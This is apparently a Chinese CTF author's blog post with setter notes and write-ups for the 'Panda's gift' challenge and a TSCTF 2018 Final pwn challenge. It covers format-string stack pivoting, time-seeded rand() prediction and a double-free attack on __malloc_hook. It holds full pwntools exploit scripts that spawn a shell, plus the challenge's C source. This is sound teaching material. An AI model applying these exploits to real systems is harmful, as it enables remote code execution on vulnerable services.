胖哈勃Panda's gift 及 TSCTF 2018 FINAL出题笔记

胖哈勃Panda’s gift出题

题目分析

题目在main函数中首先提高了栈地址，去掉了部分栈地址随机化（后2字节），便于后续利用。

在init函数中，利用时间作为随机数种子，使用mmap伪随机生成2个内存块，地址可预测。作为题目中visitor_name、motto两个变量的可使用内存。

在login函数中，提供了三个功能。1. 向visitor_name赋值，长度最大为6字节。 2. 向motto赋值，长度最大为0x100字节。 3.打印motto的值。

上述三个功能由一个全局变量flag控制每个功能仅能调用一次。

漏洞设置

1、 利用libc及固定时间，visitor_name、motto地址可预测。

2、 在login的set_name函数中，设置了一个6字节的格式化字符串漏洞，且漏洞仅能利用一次。

漏洞利用

首先，题目在编译时开启了RELRO、NX、CANARY保护，使得got表不可写、不能通过简单溢出利用漏洞。

地址预测

在链接远程服务器时同时启动脚本，利用python的cdll库与服务器同样的libc可以达到预测的两个地址的效果，如：

if not debug:	
  	p = remote('127.0.0.1',  9999)#process('./pwn1')
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
	libc_run = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
	libc_run.srand(libc_run.time(0))
	libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
v2 = 0
while (v2 <= 0x10000 ):
    v2 = libc_run.rand() & 0xFFFFF000;
visitor_name =  v2
v2 = 0;
while ((v2 <= 0x10000 )|(visitor_name == v2)):
    v2 = libc_run.rand() & 0xFFFFF000;
motto =  v2

printf格式化字符串利用

因为题目本身仅存在一个显式漏洞，只能从该漏洞入手。

由于仅给了6字节的格式化字符串利用，因此考虑用%hn对rbp链写\x0000。

在0x400d31下断点后，可以看到栈结构如下：

00:0000│ rbp rsp  0x7ffc5dc00110 —▸ 0x7ffc5dc00120 —▸ 0x7ffc5dc00150 —▸ 0x7ffc5dc00180 ◂— ...
01:0008│          0x7ffc5dc00118 —▸ 0x400d47 ◂— nop    
02:0010│          0x7ffc5dc00120 —▸ 0x7ffc5dc00150 —▸ 0x7ffc5dc00180 —▸ 0x7ffc5df09410 ◂— ...
03:0018│          0x7ffc5dc00128 —▸ 0x400eba ◂— jmp    0x400f4b
04:0020│          0x7ffc5dc00130 ◂— 0x0
05:0028│          0x7ffc5dc00138 ◂— 0x100400bf8
06:0030│          0x7ffc5dc00140 —▸ 0x4010bc ◂— and    eax, 0x6e610064 /* '%d' */
07:0038│          0x7ffc5dc00148 ◂— 0xcc345db59e141600

当向rsp所指的位置利用 %6$hn 可以使得在函数返回到login函数时，login的rbp寄存器的后2字节被清零，造成栈迁移。而login函数在调用scanf函数时，使用rbp对格式化字符串寻址：

.text:0000000000400E0C                 mov     rax, [rbp+var_10]
.text:0000000000400E10                 mov     rsi, rdx
.text:0000000000400E13                 mov     rdi, rax
.text:0000000000400E16                 mov     eax, 0
.text:0000000000400E1B                 call    __isoc99_scanf

因此，可以控制scanf格式化字符串的地址。

scanf格式化字符串控制

上一条讲了printf格式化字符串利用方法，而在调用printf格式化字符串前，可以利用set_motto函数预先在栈上布置好相关的地址。

tip: 在出题时，我选择用抬高栈的方法使得使用printf格式化字符串利用后修改的rbp一定能落在set_motto使用过的栈中，set_motto从0xxxxxfffd0开始写入到0xxxxx00110结束，但由于栈是复用的，通过对题目调整，使得0xxxxxfffd0 - 0xxxxxffff8是不被栈的复用覆盖的。因此能保证做题时可以劫持栈地址，进一步劫持scanf格式化字符串

在set_motto函数中填入 ‘scanf格式字符串’.ljust(0x20,’0’) + motto的地址，可以将scanf的格式化字符串劫持为用户输入的格式化字符串。且仅有0x20长度

由于栈上没有可以控制数据，所以并不能对内存地址任意写。

scanf的处理特性是按照每一个参数顺序处理的，因此利用栈上的rbp链（第10个参数、第16个参数分别是两个函数栈的ebp位置）特性，构造’%dq%10\$pq%16\$pq\0’，可以达到任意写且能保证正常逻辑不崩溃的目的。

地址泄露

当前已经可以构造内存任意写了，任意写劫持motto指针为got地址，可以泄露libc地址。

p.sendline('3q'+hex(0x602058)+'q'+hex(elf.got['puts'])+'q')

由于flag变量限制，每个函数仅能调用1次，不能继续泄露了，所以对flag置零

p.sendline('1q'+hex(0x602050)+'q'+hex(0)+'q')

使用libc中的environ环境变量，可以泄露栈地址

p.sendline('3q'+hex(0x602058)+'q'+hex(libc.symbols['environ'])+'q')

劫持控制流

由于存在canary，直接栈溢出不能用的，此时劫持控制流可以通过修改调用

text:0000000000400E1B call __isoc99_scanf

处的返回地址，相当于函数自修改返回地址，将其修改为one_gadget，就可以拿到shell了。

EXP

#coding:utf-8
from ctypes import *
from pwn import *
import time
debug=1
elf = ELF('./babyfmt')
if debug:
	p= process('./babyfmt')
	context.log_level = 'debug'
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
	libc_run = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
	libc_run.srand(libc_run.time(0))
	libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
	gdb.attach(p,'b *0x400d31\nb *0x400e1b\n')
else:
	p = remote('127.0.0.1',  9999)#process('./pwn1')
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
	libc_run = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
	libc_run.srand(libc_run.time(0))
	libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
	#gdb.attach(p,'b *0x400e1b\n')
v2 = 0
while (v2 <= 0x10000 ):
    v2 = libc_run.rand() & 0xFFFFF000;
visitor_name =  v2#mmap((void *)(signed int)v2, 0x1000uLL, 3, 34, -1, 0LL);
v2 = 0;
while ((v2 <= 0x10000 )|(visitor_name == v2)):
    v2 = libc_run.rand() & 0xFFFFF000;
motto =  v2#mmap((void *)(signed int)v2, 0x1000uLL, 3, 34, -1, 0LL);   
print '[+] motto ',hex(motto) 

p.recvuntil('>')
p.sendline('2')
p.recvuntil('motto:')
p.sendline('%dq%10$pq%16$pq\0'.ljust(0x20)+p64(motto))


p.recvuntil('>')
p.sendline('1')
p.recvuntil('name')
p.sendline('%6$hn')

p.recvuntil('>')
p.sendline('3q'+hex(0x602058)+'q'+hex(elf.got['puts'])+'q')
libc.address = u64(p.recv(6).ljust(8,'\0') )- libc.symbols['puts']
print "[+] system",hex(libc.symbols['system'])
p.recvuntil('>')
p.sendline('1q'+hex(0x602050)+'q'+hex(0)+'q')
p.recvuntil('>')
p.sendline('3q'+hex(0x602058)+'q'+hex(libc.symbols['environ'])+'q')

#p.sendline('1q'+hex(libc.symbols['__malloc_hook'])+'q'+hex(libc.address +0x4526a ))
#add("fmt",0x50,"%dp4nda%10$pp4nda%16$pp4nda\0","...".ljust(0x20,'c'))

stack =  u64(p.recv(6).ljust(8,'\0') ) &0xfffffffffff00000 -0x300000
print "[+] stack",hex(stack)
p.recvuntil('>')
p.sendline('1q'+hex(0x602050)+'q'+hex(0)+'q')
#p.recvuntil('>')
#p.sendline('1q'+hex(motto+12)+'q'+hex(0x007073303824))

p.recvuntil('>')
p.sendline('1q'+hex(stack+0x128)+'q'+hex(libc.address+0x4526a)+'q')
p.interactive()
'''
0x45216	execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a	execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4	execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147	execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

'''

##other

比赛网址

题目链接 ， 密码： 7nb6

在*ctf 2018里出现过一道scanf格式字符串的利用，那题比较没有canary，使用%256s就溢出执行rop了。见到考察自构格式化字符串的比较少，所以搞了一题，利用思路和bss段上的printf格式化字符串是类似的，结合printf和scanf搞了一个格式化字符串漏洞大礼包。在编译题目时对栈重新构造了一下，避免了做题去碰随机化的尴尬，在scanf格式化字符串长度那里可以再减小一点，我用了15个字节，在题目中预留了32字节的长度。

由于自己太菜了，忘了libc函数是没有canary保护的，在劫持scanf格式化字符串那里本身就可以劫持scanf的返回地址写ROP了，失去了后面跳板构造内存任意写的作用了，如果那里有canary的话只能按照预期的方法来做了。

拿到一血、二血的test_for_pwn、Swings 大佬都是用这个非预期出的，觉得还是有点失落，但大佬们还是真的很强。

不过，这次比赛名称用了Panda’s gift真的是比较暖心了，虽然题目被非预期了，但是还是学到了很多东西。

TSCTF 2018 FINAL PWN1 Writeup

此题中留了3处可以获得flag的点

伪随机数预测

题目中留了一个black-jack游戏，代码参考了pwnable.kr中题目的代码，但里面的漏洞和逻辑bug被我修复了，每一轮游戏可以下注，当达到一定分数时，可以拿到加密后的flag，此题问题在于初始化中调用了srand(time(0)/60)作为伪随机种子，只要在与服务器上程序启动的一分钟以内去生成随机数都是可以正确预测随机数的。相当于可以预测扑克牌生成的序列，当预测到这一轮电脑会赢的时候就下注$1，预测自己会赢的话就全部下注，过不了几轮就可以拿到加密后的flag，解密就可以了。

#coding:utf-8

from pwn import *
import time
from ctypes import *
debug=1
last = list()

ori = -1
elf = ELF('./DNS_Server')
if debug:
	libc=CDLL("/lib/x86_64-linux-gnu/libc.so.6")
	libc.srand(libc.time(0)/60)
	p= process('./DNS_Server')
	context.log_level = 'debug'
	#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
	#gdb.attach(p,'b set_motto\nb set_name')
else:
	p = remote('172.16.20.11',  2111)#process('./pwn1')
	libc = ELF('./libc-2.23.so')
def randcard(dealer):
	global last,ori
	if len(last)>0:
		num = last[0]%13+1
		last = last[1:]
	else:
		ori = libc.rand()
		num = ori%13+1
		
	 
	if num >= 12:
		num = 10
	elif num == 11:
		if dealer<=10:
			num = 11
		else:
			num = 1
	else:
		num = num
	return num

def round():
	global ori
	player = 0
	dealer = 0
	player_flag = 0
	dealer_flag = 0	
	Hit = 0
	Stay = 0
	getrand()#,last
	player+=randcard(player)
	#print '--'
	p.recvuntil('Your Total is ')
	tmp =int(p.recvline()[:-1])
	if (tmp!= player):
		print '[-] rand num1 wrong !with %d vs %d'%(tmp,player)
		exit(0)
	p.recvuntil('The Dealer Has a Total of ')
	dealer+=randcard(dealer)	
	tmp =int(p.recvline()[:-1])
	if (tmp!= dealer):
		print '[-] rand num2 wrong !%d vs %d'%(tmp,dealer)
		exit(0)	
	while(1):
		if player == 21:
			#print '[+++]1 d,p',dealer,player,last		
			return 1,Hit,Stay
		if player<=21:
			if player_flag!=1:
				card_type = getrand()
				card_num  = randcard(player)
				if (player + card_num )<=21:
					player+=card_num
					Hit +=1
				else:
					last.append(card_type)
					last.append(ori)
					player_flag =1
					Stay = 1

				if dealer<17:
					dealer += randcard(dealer)

				if dealer==21:
					#print '[+++]2 d,p',dealer,player,last	
					return 0,Hit,Stay
				if dealer>21:
					#print '[+++]3 d,p',dealer,player	,last	
					return 1,Hit,Stay
			else:
				if dealer<17:
					dealer += randcard(dealer)
				if dealer>=17:
					if player>=dealer:
						#print '[+++]4 d,p',dealer,player	,last	
						return 1,Hit,Stay
					if player<dealer:
						#print '[+++]5 d,p',dealer,player	,last	
						return 0,Hit,Stay
					if dealer>21:
						#print '[+++]6 d,p',dealer,player	,last
						return 1,Hit,Stay





	# (p.recvuntil(Your Total is ))
def getrand():
	global last_two,last
	if len(last)>0:
		num = last[0]
		last = last[1:]
		#print '[***]',last
	else:
		num = libc.rand()
	return num

win = 0
p.recvuntil('>')
p.sendline(str(0xbabe))	
p.recvuntil('Y/N')
p.sendline('Y')
p.recvuntil("Choice:")
p.sendline('1')
while 1:
	'''
	if win>=6:
		p.recvuntil('flag :')

		flag = p.recv()
		flag_decrypt = ""
		for i in range(len(flag)):
			flag_decrypt += chr((getrand()%256)^ord(flag[i]))
		print flag_decrypt
		exit(0)
	'''
	if ")b" in p.recvuntil(":"):
		p.recvuntil('flag :\n')
		flag = p.recv()
		flag_decrypt = ""
		for i in range(len(flag)):
			flag_decrypt += chr((getrand()%256)^ord(flag[i]))
		print flag_decrypt
		exit(0)		

	p.recvuntil(' $')
	money = int(p.recvline()[:-1])
	result,hit,stay = round()
	if result :
		p.recvuntil("$")
		p.sendline(str(money))
		for i in range(0,hit):
			p.recvuntil("Please Enter H to Hit or S to Stay.")
			p.sendline("H")
		for i in range(0,stay):
			p.recvuntil("Please Enter H to Hit or S to Stay.")
			p.sendline("S")			
		#win+=1
	else:
		p.recvuntil("$")
		p.sendline(str(1))
		for i in range(0,hit):
			p.recvuntil("Please Enter H to Hit or S to Stay.")
			p.sendline("H")
		for i in range(0,stay):
			p.recvuntil("Please Enter H to Hit or S to Stay.")
			p.sendline("S")			
	p.recvuntil('Please Enter Y for Yes or N for No\n')
	p.sendline('Y')



p.interactive()

Double Free

题目中有一个增加DNS和删除DNS的功能，在删除功能中按照domain名进行查找并Free，但仅把最后一个DNS节点指针置空，因此，两次Delete会造成Double Free。但是题目中我设置了一个坑点，在于DNS节点Free以前会检查是否是当前用户释放的，也就是name字段，当简单的double free时，由于fd指针位置已经被置为某地址了，所以不能通过检查而释放，此时发现检查字段用的是strcmp来比较的，将name字段设置为‘\x00’*7即可通过检查。比较简单的libc泄露地址方法是用unsorted bin未清空来做，泄露main_arena+88这个地址。以后的方法是常规套路：将Double Free转换为UAF，形成循环链表，劫持长度为0x70的fastbin链到__malloc_hook-0x30，以one_gadget覆写__malloc_hook，在申请堆块时候触发malloc从而拿到shell。

另外，堆漏洞由于我写错了一个函数，出现了一个堆溢出漏洞，膜一发以非预期解法解出题目的师傅

#coding:utf-8

from pwn import *
import time
debug=1
elf = ELF('./DNS_Server')
if debug:
	p= process('./DNS_Server')
	context.log_level = 'debug'
	libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
	gdb.attach(p)
else:
	p = remote('172.16.20.11',  2111)#process('./pwn1')
	libc = ELF('./libc-2.23.so')

def add(domain,length,remark,ip):
	p.recvuntil(">")
	p.sendline("2")
	p.recvuntil("domain:")
	p.sendline(domain)
	p.recvuntil("length")
	p.sendline(str(length))
	p.recvuntil("remark:")
	p.sendline(remark)
	p.recvuntil("IP:")
	p.send(ip)
def delete(domain):
	p.recvuntil(">")
	p.sendline("4")
	p.recvuntil("domain:")
	p.sendline(domain)
def show(domain):
	p.recvuntil(">")
	p.sendline("3")
	p.recvuntil("domain:")
	p.sendline(domain)
def leak():
	add("leak",0x100,"p4nda","...12345".ljust(0x20,'b'))
	add("padding",0x100,"p4nda","...12345".ljust(0x20,'b'))	
	add("leak",0x100,"p4nda","...12345".ljust(0x20,'b'))
	add("padding",0x100,"p4nda","...12345".ljust(0x20,'b'))	
	add("leak",0x100,"p4nda","...12345".ljust(0x20,'b'))
	add("padding",0x100,"p4nda","...12345".ljust(0x20,'b'))	
	delete("leak")	
	show("leak")

leak()
p.recvuntil("IP    : ")
libc.address  = u64(p.recv(6).ljust(8,'\0')) - 88 - 0x10 - libc.symbols["__malloc_hook"]
print '[+] system:',hex(libc.symbols['system'])
p.recvuntil("IP    : ")
heap =u64(p.recv(4).ljust(8,'\0'))
print '[+] heap:',hex(heap)
p.recvuntil(">")
p.sendline('1')
p.recvuntil('>')
p.sendline('1')
p.recvuntil("name")
p.sendline('\0'*6)
p.recvuntil(">")
p.sendline('4')
add("leak",0x100,"p4nda","...12345".ljust(0x20,'b'))
add("padding",0x100,"p4nda","...12345".ljust(0x20,'b'))	
add("leak",0x100,"p4nda","...12345".ljust(0x20,'b'))
#raw_input()
add("step1",0x40,"p4nda","...".ljust(0x20,'1'))
add("step1",0x40,"p4nda","...".ljust(0x20,'1'))
delete("step1")
delete("step1")
delete("leak")
#raw_input()
add("step2",0x40,"p4nda",(p64(libc.symbols['__malloc_hook']-0x23)+"...").ljust(0x20,'1'))
add("step3",0x40,"p4nda","...".ljust(0x20,'3'))
add("step3",0x40,"p4nda","...".ljust(0x20,'3'))
#raw_input()
add("step4",0x40,"p4nda",("\0"*0x13+p64(libc.address +0x4526a )+"...".ljust(0x20,'0')))
p.recvuntil(">")
p.sendline("2")

p.interactive()

'''
0x45216	execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a	execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4	execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147	execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

'''

格式化字符串大礼包

在set_name函数中有一个明显的格式化字符串漏洞，这个漏洞很多队伍拿来做地址泄露了，实际上也是可用的。首先七个字节，可用来写本函数中的rbp，向该位置用%hn写2字节\x00。在写完之后，在login函数的栈就被迁移到原来的栈的低地址位置了，而在set_motto函数中可以对这部分内存预先设置一下，可以达到控制scanf格式化字符串的目的，将这个格式化字符串劫持到堆上去，泄露堆地址的方法与Double Free中泄露方法是一致的，达到控制格式化字符串以后，需要考虑如何将scanf的格式化字符串用好。与格式化字符串在堆或bss段上的printf格式化字符串利用思路类似，可以在栈上先找一个地址链，向第一个地址写入，再对第二个地址写入，从而达到任意地址写，最终劫持puts@got 为system，以show_motto函数触发漏洞就可以拿到shell了。

利用流程是：以堆泄露libc、堆地址->在堆上预先布置好scanf格式化字符串->以set_motto预先布置好栈上数据->调用set_name对login函数做栈迁移->利用login函数的scanf写got表->触发show_motto函数拿到shell

这个就是一个简化版本的胖哈勃题目，出在这里想看一下有什么解法是我非预期的，当时线下赛的时候没有人用这个方法来做，还是没有想到上面提到的那个劫持返回地址…

#coding:utf-8

from pwn import *
import time
debug=0
elf = ELF('./DNS_Server')
if debug:
	p= process('./DNS_Server')
	context.log_level = 'debug'
	libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
	gdb.attach(p,'b set_motto\nb set_name')
else:
	p = remote('172.16.20.17',  40111)#process('./pwn1')
	libc = ELF('./libc-2.23.so')

def add(domain,length,remark,ip):
	p.recvuntil(">")
	p.sendline("2")
	p.recvuntil("domain:")
	p.sendline(domain)
	p.recvuntil("length")
	p.sendline(str(length))
	p.recvuntil("remark:")
	p.sendline(remark)
	p.recvuntil("IP:")
	p.send(ip)
def delete(domain):
	p.recvuntil(">")
	p.sendline("4")
	p.recvuntil("domain:")
	p.sendline(domain)
def show(domain):
	p.recvuntil(">")
	p.sendline("3")
	p.recvuntil("domain:")
	p.sendline(domain)
def leak():
	add("leak",0x100,"p4nda","...12345".ljust(0x20,'b'))
	add("padding",0x100,"p4nda","...12345".ljust(0x20,'b'))	
	add("leak",0x100,"p4nda","...12345".ljust(0x20,'b'))
	add("padding",0x100,"p4nda","...12345".ljust(0x20,'b'))	
	add("leak",0x100,"p4nda","...12345".ljust(0x20,'b'))
	add("padding",0x100,"p4nda","...12345".ljust(0x20,'b'))	
	delete("leak")	
	show("leak")

leak()
p.recvuntil("IP    : ")
libc.address  = u64(p.recv(6).ljust(8,'\0')) - 88 - 0x10 - libc.symbols["__malloc_hook"]
print '[+] system:',hex(libc.symbols['system'])
p.recvuntil("IP    : ")
heap =u64(p.recv(4).ljust(8,'\0'))
print '[+] heap:',hex(heap)
add("fmt",0x50,"%dp4nda%10$pp4nda%16$pp4nda\0","...".ljust(0x20,'c'))
p.recvuntil('>')
p.sendline('1')	
p.recvuntil('>')
p.sendline('2')
p.recvuntil('motto:')
for i in range(0,8):
	if(((heap+48)>>(8*i))&0xff) ==0x0a:
		print "bad addr"
		exit(0)
p.sendline('/bin/sh\0'+'a'*(0xf0-0x10-8)+p64(heap+48))
p.recvuntil('>')
p.sendline('1')
p.recvuntil('name')
p.sendline('%6$hn')
p.recvuntil(">")
p.sendline("3p4nda"+hex(elf.got['puts'])+"p4nda"+hex(libc.symbols['system'])+'p4nda')
p.recvuntil('motto')
p.sendline('p4nda')
p.interactive()

题目源码

#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <time.h>
#include <fcntl.h>                //Used for srand((unsigned) time(NULL)) command
//#include <process.h>             //Used for system("cls") command
 
#define spade 35                 //Used to print spade symbol
#define club 36                 //Used to print club symbol
#define diamond 37               //Used to print diamond symbol
#define heart 38                 //Used to print heart symbol
#define RESULTS "Blackjack.txt"  //File name is Blackjack
#define WIN_SUM 65535 
 

struct DNS_Node
{
	char user[8];
	char domain[0x30];
	char *ptr;
};

//Global Variables
int k;
int l;
int d;
int won;
int loss;
int cash = 5;
unsigned int bet;
int random_card;
int player_total=0;
int dealer_total=0;
char * visitor_name ;
int login_flag=0;
char * motto=0;
struct DNS_Node *DNS_Node_List[0x20];
//Function Prototypes
int clubcard();      //Displays Club Card Image
int diamondcard();   //Displays Diamond Card Image
int heartcard();     //Displays Heart Card Image
int spadecard();     //Displays Spade Card Image
int randcard();      //Generates random card
int betting();       //Asks user amount to bet
void asktitle();     //Asks user to continue
void rules();        //Prints "Rules of Vlad's Blackjack" menu
void play();         //Plays game
void dealer();       //Function to play for dealer AI
void stay();         //Function for when user selects 'Stay'
void cash_test();    //Test for if user has cash remaining in purse
void askover();      //Asks if user wants to continue playing
void fileresults();  //Prints results into Blackjack.txt file in program directory

//Main Function
int game(void)
{
    int choice1;
    puts("-*-*-*-*-*首家线上赌场上线了，性感泽哥女装发牌(・∀・)つ *-*-*-*-*-");
    printf("\n");
    printf("\n");
    printf("\n");
    printf("\n              222                111                            ");
    printf("\n            222 222            11111                              ");
    printf("\n           222   222          11 111                            "); 
    printf("\n                222              111                               "); 
    printf("\n               222               111                           ");   
    printf("\n");
    printf("\n%c%c%c%c%c     %c%c            %c%c         %c%c%c%c%c    %c    %c                ", club, club, club, club, club, spade, spade, diamond, diamond, heart, heart, heart, heart, heart, club, club);  
    printf("\n%c    %c    %c%c           %c  %c       %c     %c   %c   %c              ", club, club, spade, spade, diamond, diamond, heart, heart, club, club);            
    printf("\n%c    %c    %c%c          %c    %c     %c          %c  %c               ", club, club, spade, spade, diamond, diamond, heart, club, club);                        
    printf("\n%c%c%c%c%c     %c%c          %c %c%c %c     %c          %c %c              ", club, club, club, club, club, spade, spade, diamond, diamond, diamond, diamond, heart, club, club);      
    printf("\n%c    %c    %c%c         %c %c%c%c%c %c    %c          %c%c %c             ", club, club, spade, spade, diamond, diamond, diamond, diamond, diamond, diamond, heart, club, club, club);                       
    printf("\n%c     %c   %c%c         %c      %c    %c          %c   %c               ", club, club, spade, spade, diamond, diamond, heart, club, club);                                         
    printf("\n%c     %c   %c%c        %c        %c    %c     %c   %c    %c             ", club, club, spade, spade, diamond, diamond, heart, heart, club, club);                                                            
    printf("\n%c%c%c%c%c%c    %c%c%c%c%c%c%c   %c        %c     %c%c%c%c%c    %c     %c            ", club, club, club, club, club, club, spade, spade, spade, spade, spade, spade, spade, diamond, diamond, heart, heart, heart, heart, heart, club, club);                                                                                     
    printf("\n");     
    printf("\n                        21                                   ");
     
    printf("\n     %c%c%c%c%c%c%c%c      %c%c         %c%c%c%c%c    %c    %c                ", diamond, diamond, diamond, diamond, diamond, diamond, diamond, diamond, heart, heart, club, club, club, club, club, spade, spade);                     
    printf("\n        %c%c        %c  %c       %c     %c   %c   %c              ", diamond, diamond, heart, heart, club, club, spade, spade);                                      
    printf("\n        %c%c       %c    %c     %c          %c  %c               ", diamond, diamond, heart, heart, club, spade, spade);                                           
    printf("\n        %c%c       %c %c%c %c     %c          %c %c              ", diamond, diamond, heart, heart, heart, heart, club, spade, spade);                                     
    printf("\n        %c%c      %c %c%c%c%c %c    %c          %c%c %c             ", diamond, diamond, heart, heart, heart, heart, heart, heart, club, spade, spade, spade);                                                
    printf("\n        %c%c      %c      %c    %c          %c   %c               ", diamond, diamond, heart, heart, club, spade, spade);                                                                               
    printf("\n     %c  %c%c     %c        %c    %c     %c   %c    %c             ", diamond, diamond, diamond, heart, heart, club, spade, spade);                                                                                                               
    printf("\n      %c%c%c      %c        %c     %c%c%c%c%c    %c     %c            ", diamond, diamond, diamond, heart, heart, club, club, club, club, club, spade, spade);                                                                                                                                        
    printf("\n");  
    printf("\n         222                     111                         ");
    printf("\n        222                      111                         ");
    printf("\n       222                       111                         ");
    printf("\n      222222222222222      111111111111111                       ");
    printf("\n      2222222222222222    11111111111111111                         ");
    printf("\n");
    puts("-*-*-*-*-*首家线上赌场上线了，性感泽哥女装发牌(・∀・)つ *-*-*-*-*-");
    printf("\n");
     
    asktitle();
     
    printf("\n");
    printf("\n");
    //system("pause");
    return(0);
} //end program
 
void asktitle() // Function for asking player if they want to continue
{
    char choice1;
    int choice2;
     
     printf("\n                 Are You Ready?");
     printf("\n                ----------------");
     printf("\n                      (Y/N)\n                        ");
     scanf("\n%c",&choice1);
 
    while((choice1!='Y') && (choice1!='y') && (choice1!='N') && (choice1!='n')) // If invalid choice entered
    {                                                                           
        printf("\n");
        printf("Incorrect Choice. Please Enter Y for Yes or N for No.\n");
        scanf("%c",&choice1);
    }
 
 
    if((choice1 == 'Y') || (choice1 == 'y')) // If yes, continue. Prints menu.
    { 
            //system("clear");
            printf("\nEnter 1 to Begin the Greatest Game Ever Played.");
            printf("\nEnter 2 to See a Complete Listing of Rules.");
            printf("\nEnter 3 to Exit Game. (Not Recommended)");
            printf("\nChoice: ");
            scanf("%d", &choice2); // Prompts user for choice
            if((choice2<1) || (choice2>3)) // If invalid choice entered
            {
                printf("\nIncorrect Choice. Please enter 1, 2 or 3\n");
                scanf("%d", &choice2);
            }
            switch(choice2) // Switch case for different choices
            {   
                case 1: // Case to begin game
                  // system("clear");
                    
                   play();
                                       
                   break;
                    
                case 2: // Case to see rules
                 //  system("clear");
                   rules();
                   break;
                    
                case 3: // Case to exit game
                   printf("\nYour day could have been perfect.");
                   printf("\nHave an almost perfect day!\n\n");
                   //system("pause");
                   exit(0);
                   break;
                    
                default:
                   printf("\nInvalid Input");
            } // End switch case
    } // End if loop
    
             
 
    else if((choice1 == 'N') || (choice1 == 'n')) // If no, exit program
    {
        printf("\nYour day could have been perfect.");
        printf("\nHave an almost perfect day!\n\n");
        //system("pause");
        exit(0);
    }
     
    return;
} // End function
 
void rules() //Prints "Rules of Vlad's Blackjack" list
{
     char choice1;
     int choice2;
      
     printf("\n           RULES of VLAD's BLACKJACK");
     printf("\n          ---------------------------");
     printf("\nI.");
     printf("\n     Thou shalt not question the odds of this game.");
     printf("\n      %c This program generates cards at random.", spade);
     printf("\n      %c If you keep losing, you are very unlucky!\n", diamond);
      
     printf("\nII.");
     printf("\n     Each card has a value.");
     printf("\n      %c Number cards 1 to 10 hold a value of their number.", spade);
     printf("\n      %c J, Q, and K cards hold a value of 10.", diamond);
     printf("\n      %c Ace cards hold a value of 11", club);
     printf("\n     The goal of this game is to reach a card value total of 21.\n");
      
     printf("\nIII.");
     printf("\n     After the dealing of the first two cards, YOU must decide whether to HIT or STAY.");
     printf("\n      %c Staying will keep you safe, hitting will add a card.", spade);
     printf("\n     Because you are competing against the dealer, you must beat his hand.");
     printf("\n     BUT BEWARE!.");
     printf("\n      %c If your total goes over 21, you will LOSE!.", diamond);
     printf("\n%c%c%c YOUR RESULTS ARE RECORDED AND FOUND IN SAME FOLDER AS PROGRAM %c%c%c\n", spade, heart, club, club, heart, spade);
     printf("\nWould you like to go the previous screen? (I will not take NO for an answer)");
     printf("\n                  (Y/N)\n                    ");
     scanf("\n%c",&choice1);
      
     while((choice1!='Y') && (choice1!='y') && (choice1!='N') && (choice1!='n')) // If invalid choice entered
    {                                                                           
        printf("\n");
        printf("Incorrect Choice. Please Enter Y for Yes or N for No.\n");
        scanf("%c",&choice1);
    }
 
 
    if((choice1 == 'Y') || (choice1 == 'y')) // If yes, continue. Prints menu.
    { 
         //   system("clear");
            asktitle();
    } // End if loop
    
             
 
    else if((choice1 == 'N') || (choice1 == 'n')) // If no, convinces user to enter yes
    {
       // system("clear");
        printf("\n                 I told you so.\n");
        asktitle();
    }
     
    return;
} // End function
 
int clubcard() //Displays Club Card Image
{
     
     
    //srand((unsigned) time(NULL)); //Generates random seed for rand() function
    k=rand()%13+1;
     
    if(k<=9) //If random number is 9 or less, print card with that number
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  %d  |\n", k);
    printf("|    %c|\n", club);
    printf("-------\n");
    }
     
     
    if(k==10) //If random number is 10, print card with J (Jack) on face
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  J  |\n");
    printf("|    %c|\n", club);
    printf("-------\n");
    }
     
     
    if(k==11) //If random number is 11, print card with A (Ace) on face
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  A  |\n");
    printf("|    %c|\n", club);
    printf("-------\n");
    if(player_total<=10) //If random number is Ace, change value to 11 or 1 depending on dealer total
         {
             k=11;
         }
          
         else
         {
 
             k=1;
         }
    }
     
     
    if(k==12) //If random number is 12, print card with Q (Queen) on face
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  Q  |\n");
    printf("|    %c|\n", club);
    printf("-------\n");
    k=10; //Set card value to 10
    }
     
     
    if(k==13) //If random number is 13, print card with K (King) on face
    {
    //Club Card
    printf("-------\n");
    printf("|%c    |\n", club);
    printf("|  K  |\n");
    printf("|    %c|\n", club);
    printf("-------\n");
    k=10; //Set card value to 10
    }
    return k;           
}// End function
 
int diamondcard() //Displays Diamond Card Image
{
     
     
    //srand((unsigned) time(NULL)); //Generates random seed for rand() function
    k=rand()%13+1;
     
    if(k<=9) //If random number is 9 or less, print card with that number
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  %d  |\n", k);
    printf("|    %c|\n", diamond);
    printf("-------\n");
    }
     
    if(k==10) //If random number is 10, print card with J (Jack) on face
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  J  |\n");
    printf("|    %c|\n", diamond);
    printf("-------\n");
    }
     
    if(k==11) //If random number is 11, print card with A (Ace) on face
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  A  |\n");
